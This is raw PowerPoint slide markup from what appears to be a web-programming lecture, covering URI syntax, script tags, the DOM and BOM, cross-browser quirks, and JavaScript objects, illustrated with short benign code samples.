              <a:t>&lt;script language="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4081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Uniform Resource Identifier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Essential meta-data to reach/find a resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Answers the following questions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Which server has it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>How do I ask?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>How can the server locate the resource?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Latest definition in RFC 3986 (January 2005)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35724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9986" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3092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19986" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6474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4.2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08818" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19783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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can also include external JavaScript files in your HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As opposed to the inline JavaScript that we saw in the previous example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="&lt;absolute or relative URL"&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the browser parses this HTML element, it automatically fetches and executes the JavaScript before continuing to parse the rest of the HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Semantically equivalent as if the JavaScript was directly in the page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7194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Object Model (DOM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Document Object Model is a programmatic interface in JavaScript to the manipulation of client-side content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Created a globally accessible in JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The document object is used to traverse, query, and manipulate the browser's representation of the HTML page as well as handle events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM 0, released in 1995 with original JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very basic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intermediate DOM began in 1997 with Microsoft and Netscape releasing incompatible improvements to DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W3C stepped in and started to define standards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM 1, October 1998</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM 2, November 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM 3, April 2004</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM is now a W3C Living Standard, and various snapshots of the standard will turn into DOM 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17010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 Example</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&lt;title&gt;DOM Example&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;h1&gt;DOM Example&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;div id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>insert_here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;script&gt;</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hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('HR');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>insert_here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4346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5.17.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54982" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8154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DOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Coding proper DOM access in a cross-browser approach is a nightmare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some highlights from http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stackoverflow.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/questions/565641/what-cross-browser-issues-have-you-faced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"Internet Explorer does not replace &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nbsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; or HTML char code 160, you need to replace its Unicode equivalent \u00a0"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"In Firefox a dynamically created input field inside a form (created using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) does not pass its value on form submit."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in Internet Explorer will return an element even if the element name matches. Mozilla only returns element if id matches."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is an amazing library that provides a uniform interface and handles all the DOM cross-browser compatibilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49175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 Object Model (BOM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Programmatic interface to everything outside the document (aka the browser)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No complete standard (the term BOM is colloquial)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>window.name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "New name"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>window.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14562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JavaScript vs. DOM and BOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript the language is defined separate from the DOM and BOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM has its own specification, and much of the BOM is specified in HTML5 spec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the web context, these are often confused, because they are used together so often</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, now with JavaScript popping up all over the place, it's an important distinction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side code using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Node.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database queries (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MongoDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flash (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ActionScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which has its own DOM-like capabilities)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java applications (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javax.script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows applications (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WinRT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6746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a:t>URI – Syntax </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;scheme&gt;:&lt;authority&gt;/&lt;path&gt;?&lt;query&gt;#&lt;fragment&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25591555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 Object-based</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Almost everything in JavaScript is an object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objects are associative arrays (hash tables), and the properties and values can be added and deleted at run-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> object = {test: "foo", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>: 50};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>object['foo'] = object;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(object[object['test']]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>object.num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = 1000;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(object['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
